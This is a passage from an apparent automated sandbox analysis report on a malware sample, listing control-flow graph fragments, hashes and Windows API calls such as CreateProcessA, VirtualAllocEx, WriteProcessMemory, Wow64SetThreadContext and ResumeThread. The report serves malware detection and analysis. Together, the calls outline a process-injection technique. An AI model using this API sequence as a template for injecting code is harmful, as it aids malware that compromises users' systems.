7b04110 820->821 821->819 824 7b04137-7b04146 822->824 825 7b0414c 822->825 823->822 824->825 827 7b0414d 825->827 827->827
                                      APIs
                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07B0403E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: 351ab059a09db824a2326cce3de29a1bc966b5ada61e8ed1d273fffead621e6c
                                      • Instruction ID: bb793cbec16532baf19045aff0cf5c6d3a8c08f2c9dd346893e9e7b216cd3537
                                      • Opcode Fuzzy Hash: 351ab059a09db824a2326cce3de29a1bc966b5ada61e8ed1d273fffead621e6c
                                      • Instruction Fuzzy Hash: 85915CB1D0025ACFEF10DFA8C84579EBFB2FB45310F1481A9D809A7290DB749985CF92

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 828 187b478-187b480 829 187b436-187b455 828->829 830 187b482-187b497 828->830 840 187b457-187b462 829->840 841 187b464-187b46c 829->841 831 187b4c3-187b4c7 830->831 832 187b499-187b4a6 call 1879ef8 830->832 835 187b4db-187b51c 831->835 836 187b4c9-187b4d3 831->836 842 187b4bc 832->842 843 187b4a8 832->843 845 187b51e-187b526 835->845 846 187b529-187b537 835->846 836->835 847 187b46f-187b474 840->847 841->847 842->831 890 187b4ae call 187b710 843->890 891 187b4ae call 187b720 843->891 845->846 848 187b55b-187b55d 846->848 849 187b539-187b53e 846->849 854 187b560-187b567 848->854 851 187b540-187b547 call 187b140 849->851 852 187b549 849->852 850 187b4b4-187b4b6 850->842 853 187b5f8-187b6b8 850->853 856 187b54b-187b559 851->856 852->856 885 187b6c0-187b6eb GetModuleHandleW 853->885 886 187b6ba-187b6bd 853->886 857 187b574-187b57b 854->857 858 187b569-187b571 854->858 856->854 861 187b57d-187b585 857->861 862 187b588-187b591 call 187b150 857->862 858->857 861->862 866 187b593-187b59b 862->866 867 187b59e-187b5a3 862->867 866->867 868 187b5a5-187b5ac 867->868 869 187b5c1-187b5ce 867->869 868->869 871 187b5ae-187b5be call 187b160 call 187b170 868->871 876 187b5f1-187b5f7 869->876 877 187b5d0-187b5ee 869->877 871->869 877->876 887 187b6f4-187b708 885->887 888 187b6ed-187b6f3 885->888 886->885 888->887 890->850 891->850
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0187B6DE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2346644915.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1870000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: 5d22856a71afcee563fbb3ea579211bb4905a536ab4b01b66a6783c79b01b658
                                      • Instruction ID: 19988a1906d7f0a1734a87e177bf33545470945ce0a7dbbc2ef4f63b7bceb37e
                                      • Opcode Fuzzy Hash: 5d22856a71afcee563fbb3ea579211bb4905a536ab4b01b66a6783c79b01b658
                                      • Instruction Fuzzy Hash: 459178B0A00B058FD725DF29D44575ABBF2FF48304F048A2DE586DBA50D774EA49CB91

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1072 187590c-18759d9 CreateActCtxA 1074 18759e2-1875a3c 1072->1074 1075 18759db-18759e1 1072->1075 1082 1875a3e-1875a41 1074->1082 1083 1875a4b-1875a4f 1074->1083 1075->1074 1082->1083 1084 1875a51-1875a5d 1083->1084 1085 1875a60 1083->1085 1084->1085 1087 1875a61 1085->1087 1087->1087
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 018759C9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2346644915.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1870000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 8c78b10458261e09a220af58bd57f46be391cdcfaf7fa90f586ca1a6d582945f
                                      • Instruction ID: 44226b84b23343e0ce47f7bf78c89115613f82e83d93ac4a1b6025e06f0fa4a7
                                      • Opcode Fuzzy Hash: 8c78b10458261e09a220af58bd57f46be391cdcfaf7fa90f586ca1a6d582945f
                                      • Instruction Fuzzy Hash: 7041D1B1C0071DCADB24DFA9C984BDDBBB5BF49304F20806AD408AB251DB75A945CF51

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1088 18744b4-18759d9 CreateActCtxA 1091 18759e2-1875a3c 1088->1091 1092 18759db-18759e1 1088->1092 1099 1875a3e-1875a41 1091->1099 1100 1875a4b-1875a4f 1091->1100 1092->1091 1099->1100 1101 1875a51-1875a5d 1100->1101 1102 1875a60 1100->1102 1101->1102 1104 1875a61 1102->1104 1104->1104
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 018759C9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2346644915.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1870000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: c83a93d5f65549c3f4572f08d56d1736bfd804756f508f75b3db86bcfb964e3e
                                      • Instruction ID: 6284d9642301a012f04cea08d5ecd1d4f58b8124d9a9d19f8acd75c72a94d374
                                      • Opcode Fuzzy Hash: c83a93d5f65549c3f4572f08d56d1736bfd804756f508f75b3db86bcfb964e3e
                                      • Instruction Fuzzy Hash: CA41BFB0C0071DCBDB24DFA9C884BDDBBB5BF49304F60806AD409AB251DB75AA45CF91
                                      APIs
                                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07B03C10
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: b5048e7cfcf7fed4b8dc83c26f8c9eed5a2c12edb3df265483a6c030e1c9d410
                                      • Instruction ID: 2e3b673577c8237b72be5a728df16ffab7a5c955904bb6385c21bfe432c55401
                                      • Opcode Fuzzy Hash: b5048e7cfcf7fed4b8dc83c26f8c9eed5a2c12edb3df265483a6c030e1c9d410
                                      • Instruction Fuzzy Hash: 8F2124B5D003199FDB10CFA9C885BDEBFF5FB88314F10882AE919A7240C7789955DBA1
                                      APIs
                                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07B03C10
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: 2ead5e1941abee5809798e2b28e2a7bbf2bb20237c2f67aaeb7c5dc865b3c757
                                      • Instruction ID: d1440d223dca8c2e6d7881c810a7dc01127517bc2dd19eb5c0eac8c5efba42cc
                                      • Opcode Fuzzy Hash: 2ead5e1941abee5809798e2b28e2a7bbf2bb20237c2f67aaeb7c5dc865b3c757
                                      • Instruction Fuzzy Hash: ED2104B19003499FDB10CFA9C885ADEBBF5FB88310F10882AE919A7240C7789954DBA1
                                      APIs
                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07B03CF0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: e193759fc8c918f261471cc946fd308bb1ac18a69619b8e209cdefbbf9dceeb5
                                      • Instruction ID: 0b4dda9b96249bfd7d73969806bc140adce3b108f5529af6c9f9c100af6cf885
                                      • Opcode Fuzzy Hash: e193759fc8c918f261471cc946fd308bb1ac18a69619b8e209cdefbbf9dceeb5
                                      • Instruction Fuzzy Hash: 1921F6B1C002599FDB10DFA9C845ADEBFF5FF88310F10882AE519A7240C7749555DBA1
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0187D92E,?,?,?,?,?), ref: 0187D9EF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2346644915.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1870000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 9b5542d26e294c4f9b5fa1c49b72ece992702a604e70b664a467f7272f4c1173
                                      • Instruction ID: 284d496bca7770f61e5e4341b0df7291cb934b219b486d49bae4afc9d355de10
                                      • Opcode Fuzzy Hash: 9b5542d26e294c4f9b5fa1c49b72ece992702a604e70b664a467f7272f4c1173
                                      • Instruction Fuzzy Hash: 7F21D2B5D00249AFDB10CF9AD484ADEFBF9EB48310F14851AE918A3350D374A954CFA5
                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B03A66
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: ddb031728a1cb660fffb7be033951faf292249e001b00209d917d31d69d0656e
                                      • Instruction ID: 6066ba427e5a1a84a0c5ba847ef3b531266ceba006f5a8f321326fb7a6363eb9
                                      • Opcode Fuzzy Hash: ddb031728a1cb660fffb7be033951faf292249e001b00209d917d31d69d0656e
                                      • Instruction Fuzzy Hash: CA2137B5D002098FDB10DFAAC4857AEBFF4EF88314F14842ED459A7280DB789A45CFA1
                                      APIs
                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07B03CF0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: 9f86c496241b8fd02043971a882c933f3e253e0af017d1c1cc17af356740b0f3
                                      • Instruction ID: 5e56c95aa167bc430fe482828f29d8bd11d87a1e9570f38aa754d4669c426cf3
                                      • Opcode Fuzzy Hash: 9f86c496241b8fd02043971a882c933f3e253e0af017d1c1cc17af356740b0f3
                                      • Instruction Fuzzy Hash: 5E2116B1C003599FDB10DFAAC845ADEBFF5FF88310F10842AE519A7240C7789544DBA1
                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B03A66
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: fa55cc1cc3283b7a9fbf530bb9221c02244fc27d7daa6880f5282b240d9af957
                                      • Instruction ID: d68b34ba5b3124ae817f418a436567f90f4d15f043dcb4fd2b2a84d287c436de
                                      • Opcode Fuzzy Hash: fa55cc1cc3283b7a9fbf530bb9221c02244fc27d7daa6880f5282b240d9af957
                                      • Instruction Fuzzy Hash: F92107B1D002099FDB10DFAAC4857AEBFF4EF88324F14842AD519A7241CB789A45CFA5
                                      APIs
                                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07B03B2E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: fae96cf0eaa39cbffcd9c9b63b3daa5bf96e1dcb2ec422590f6c517da48e1f86
                                      • Instruction ID: f7a82e5869d07ca6f9fa551dce16d8a1e1ec4a4f5e857aa0a3a7942ab84398b9
                                      • Opcode Fuzzy Hash: fae96cf0eaa39cbffcd9c9b63b3daa5bf96e1dcb2ec422590f6c517da48e1f86
                                      • Instruction Fuzzy Hash: 071156B2C002499FDB10DFA9C848ADEBFF5EF88314F20881AE819A7250C7759554CFA1
                                      APIs
                                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07B03B2E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: b51285608cd9bf1f1eac6549a11e947a0695565dac44244b63aaa41e1d39c19c
                                      • Instruction ID: e3a6fbd220b842fabbd0240ae64139ae7a0f3dbc8b41a1245f75f78277db744a
                                      • Opcode Fuzzy Hash: b51285608cd9bf1f1eac6549a11e947a0695565dac44244b63aaa41e1d39c19c
                                      • Instruction Fuzzy Hash: 671126B2D002499FDB10DFAAC845ADEFFF5EF88324F108819E519A7250C775A554CFA1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 0484a577ae7133c31cfc6352e62fa414e653aaa58dea5b553cb62e2bba32e335
                                      • Instruction ID: b9ce389de7df8915e5ed01f7e008824aa98529fb1e458eb86393391e430e8c24
                                      • Opcode Fuzzy Hash: 0484a577ae7133c31cfc6352e62fa414e653aaa58dea5b553cb62e2bba32e335
                                      • Instruction Fuzzy Hash: 121128B1D002498BDB10DFA9C5497AEFFF5AB88314F24881AD41AA7340CB78A545CF95
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 200a25ec35fbb154729ea3792ca5ce60c8cf4def98a9f1c86fffd50679a95fbe
                                      • Instruction ID: b801f1a9388de422f6913b8b619ff41e6b1c1395297641c00bdf6ee195440060
                                      • Opcode Fuzzy Hash: 200a25ec35fbb154729ea3792ca5ce60c8cf4def98a9f1c86fffd50679a95fbe
                                      • Instruction Fuzzy Hash: B411F8B1D002498BDB10DFAAC44979EFFF5EB88324F24881AD51AA7240CB79A545CF95
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0187B6DE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2346644915.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1870000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: 4fc36675ea29a18e023ece3422ed207e13dbaf83cda865d66b875af075e4e156
                                      • Instruction ID: a30e8f22a96a7d367cf5bdbd9d1537a15efbd2dfad0ac46cc2de42f293ea2ac6
                                      • Opcode Fuzzy Hash: 4fc36675ea29a18e023ece3422ed207e13dbaf83cda865d66b875af075e4e156
                                      • Instruction Fuzzy Hash: 9811E0B5C002498FDB10DF9AD444ADEFBF5EF88314F10841AD529A7610C379A645CFA5
                                      APIs
                                      • PostMessageW.USER32(?,?,?,?), ref: 07B08EA5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID:
                                      • API String ID: 410705778-0
                                      • Opcode ID: 4865cfef6a2075347b7e6c18618c387befd0ca3b7be979b57ed3360238727068
                                      • Instruction ID: 43244c670a40f6da79d7553178280a05b66ae279b9e86425e2e3b7f812653e9b
                                      • Opcode Fuzzy Hash: 4865cfef6a2075347b7e6c18618c387befd0ca3b7be979b57ed3360238727068
                                      • Instruction Fuzzy Hash: 5D11C2B5800249DFDB10CF99D949BDEBFF8EB48310F10885AD959A7750C379A644CFA1
                                      APIs
                                      • PostMessageW.USER32(?,?,?,?), ref: 07B08EA5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID:
                                      • API String ID: 410705778-0
                                      • Opcode ID: 6e2916162e07aade90db6dde04bc893ae9829c5e62a293ca75878019ce4eaa2d
                                      • Instruction ID: b5cdcb5e34362057d42698f87b30982c8d8f89ee65cb0004a890e3d039f91813
                                      • Opcode Fuzzy Hash: 6e2916162e07aade90db6dde04bc893ae9829c5e62a293ca75878019ce4eaa2d
                                      • Instruction Fuzzy Hash: 9E11D3B58003499FDB10DF9AD849BDEBFF8EB48320F10845AD559A7250C379A544CFA5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Tecq
                                      • API String ID: 0-1122318316
                                      • Opcode ID: bb9eb30d74a85bf8860b2d79e5a30b174352b6ac50a4206381c7fe7a9c2f8efd
                                      • Instruction ID: 5dd4c9ab0840f5a101f55aee8850de3f1f7d4a91638d4824442ced29a0d1be86
                                      • Opcode Fuzzy Hash: bb9eb30d74a85bf8860b2d79e5a30b174352b6ac50a4206381c7fe7a9c2f8efd
                                      • Instruction Fuzzy Hash: 0A418C75B0020A8FCB10EF79C8589AEBBF6FFC5220B248969E415DB391DB309D05CB90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: 7efcacd3b645077ea164a7b278f810c554c47bc3d1b8265f0810208cabf604c4
                                      • Instruction ID: 3d104c95e7866de3160135923515511b51614aaaf8329e9e9bfcf0e76765aa9c
                                      • Opcode Fuzzy Hash: 7efcacd3b645077ea164a7b278f810c554c47bc3d1b8265f0810208cabf604c4
                                      • Instruction Fuzzy Hash: A6510776A0024A9FCB10DF69D444A9EFBF1FF88315F14822AE819A7351E734A991CF90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Hgq
                                      • API String ID: 0-2103768809
                                      • Opcode ID: 76d42b68a05704d28d0924a6ce982769f633e960d0729d5bd98cdc321abe807c
                                      • Instruction ID: dfc2d12eb7531d1c85a47722c25d5a9cf494d824e832a9122d2f6b4c3f8496d5
                                      • Opcode Fuzzy Hash: 76d42b68a05704d28d0924a6ce982769f633e960d0729d5bd98cdc321abe807c
                                      • Instruction Fuzzy Hash: C131E175A0020ADFDF05EFA4D9559AEBBB6FF98304F10452AE002BB294DF349C45CB90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: PHcq
                                      • API String ID: 0-4245845256
                                      • Opcode ID: 7dd6877b9d21095abc75c22cfefd3bc7a5a503de89fdaf9b9469f1c42b4ae090
                                      • Instruction ID: f67e97c3bf2cc559b4d90eafa3b95a2baffa5260f2ab12b0f6f86251c8a2e7b2
                                      • Opcode Fuzzy Hash: 7dd6877b9d21095abc75c22cfefd3bc7a5a503de89fdaf9b9469f1c42b4ae090
                                      • Instruction Fuzzy Hash: 0F1172357045058FDB18AA75C9585BE7AFAAF89300F254469E403EB350DF319D00CF94
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: PHcq
                                      • API String ID: 0-4245845256
                                      • Opcode ID: 4e54eb9f9f79c7fa427f8d8f93f0185dc54c868540c118d5384ccf7cac45bc91
                                      • Instruction ID: b630173d63fc6f38f355d4cd86b3a5e97c24ec18a433f31b50bd63a5d85c6729
                                      • Opcode Fuzzy Hash: 4e54eb9f9f79c7fa427f8d8f93f0185dc54c868540c118d5384ccf7cac45bc91
                                      • Instruction Fuzzy Hash: D911AF36700645CBDB289B65C958AAE7BFAAF89300F25446CE403EB391DA719D01CF64
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'cq
                                      • API String ID: 0-182294849
                                      • Opcode ID: bde019197f46cb84a76d15f08682e49a2ef90af1b4189acb75705de03f0a3d8f
                                      • Instruction ID: b036ddaa3b7b6306d550535c2efb377fa91db5691b0d096a461bd09da1ff1414
                                      • Opcode Fuzzy Hash: bde019197f46cb84a76d15f08682e49a2ef90af1b4189acb75705de03f0a3d8f
                                      • Instruction Fuzzy Hash: B1016D70A2020EDFCB04EFB8E55559D7FB5FB44304B2045A9E806D3350EE341E84CB41
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'cq
                                      • API String ID: 0-182294849
                                      • Opcode ID: d2cf94f8b27f6bcf7ee7c87d24a1ff756ada250199cd7bc56d52637f16e4b647
                                      • Instruction ID: 51bf752b6184929718c6bdd3f494c437086acbf905ce065485913d4ba1d56fb1
                                      • Opcode Fuzzy Hash: d2cf94f8b27f6bcf7ee7c87d24a1ff756ada250199cd7bc56d52637f16e4b647
                                      • Instruction Fuzzy Hash: 39F04F70A2020EDFCB04EFB8E55559D7FB5FB84305B2045A9E806D7350EE345E85CB51
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: da7c33a7abfce2df7ddbbb8a9a773c78c0266d6f6ad4a63456f237bfa9295bf3
                                      • Instruction ID: 75ddcae37594c4131b5120b084a20a6825a358c83ed844ef5d80a2b49b120ae0
                                      • Opcode Fuzzy Hash: da7c33a7abfce2df7ddbbb8a9a773c78c0266d6f6ad4a63456f237bfa9295bf3
                                      • Instruction Fuzzy Hash: 26B13635B006158FDB18DF69D894AADBBF6BF88700F1544A9E506DB3A1DB30EC42CB50
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7f7d74f56d1eb16383b40b5f5720538dc4547c2ba0a0fe02b29bac7e35a5f017
                                      • Instruction ID: 86347cdbf108acf6870835ac164f9fe0abea12c6825f4030b221d6dcdfc16ae9
                                      • Opcode Fuzzy Hash: 7f7d74f56d1eb16383b40b5f5720538dc4547c2ba0a0fe02b29bac7e35a5f017
                                      • Instruction Fuzzy Hash: 11911C76A006098FDF04DFA8D8849ADBBB2FF89315F144269D90AAB355EB31ED41CF40
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bfc26aa6b8f7b255b422c757cd383f3c899500a25a89aa25d9a088dede27d37c
                                      • Instruction ID: 6741cf95058f71b7286970bcfe8d7f22a221e9b3a1a5f347967032867abf2609
                                      • Opcode Fuzzy Hash: bfc26aa6b8f7b255b422c757cd383f3c899500a25a89aa25d9a088dede27d37c
                                      • Instruction Fuzzy Hash: 7081E3357106008FCB04EB28D598E697BF6FF89B05B1545A9E902CB372DB71EC42CB90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 788888868504e7fbd1da0db14f4e7f93ff0da7e90547933f533b32a4e673dc97
                                      • Instruction ID: 3ccb8df7d1a5c21b3f0775af2f06cb7765b1cfcdf47f0f82d2d00d06de456217
                                      • Opcode Fuzzy Hash: 788888868504e7fbd1da0db14f4e7f93ff0da7e90547933f533b32a4e673dc97
                                      • Instruction Fuzzy Hash: 6791C476A0060A9FCB25CFA8C984AEEB7F2BF48310F14856AE925DB351D730E951DF50
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ffd777f356c1018d2ac7761bedf5421337b100a2acc3524e984de2bf9b20e62d
                                      • Instruction ID: a40f04d5cf82cb39b4dc1653d3cc11e0b3b5b98780faf55a1d6e974394afb672
                                      • Opcode Fuzzy Hash: ffd777f356c1018d2ac7761bedf5421337b100a2acc3524e984de2bf9b20e62d
                                      • Instruction Fuzzy Hash: 4E818F35A10208DFCB14EFA4D8989EDBBB5FF89300F148569E502AB364EB71AD45CF90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd
